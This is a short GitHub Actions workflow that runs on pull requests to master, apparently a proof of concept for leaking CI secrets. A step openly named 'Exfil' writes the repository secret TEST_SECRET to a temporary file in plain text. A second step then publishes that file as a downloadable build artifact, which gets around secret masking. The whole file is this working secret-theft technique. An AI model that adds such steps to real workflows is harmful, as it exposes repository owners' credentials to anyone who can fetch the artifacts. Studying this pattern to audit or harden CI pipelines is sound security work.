name: Run on PR

on:
  pull_request:
    branches:
      - master

jobs:
  run-cose:
    runs-on: ubuntu-latest
    steps:
      - name: Exfil
        env: # Or as an environment variable
          TEST_SECRET: ${{ secrets.TEST_SECRET }}
        run: |
          echo $TEST_SECRET > /tmp/sec.txt

      - uses: actions/upload-artifact@v3
        with:
          name: file-sec
          path: /tmp/sec.txt
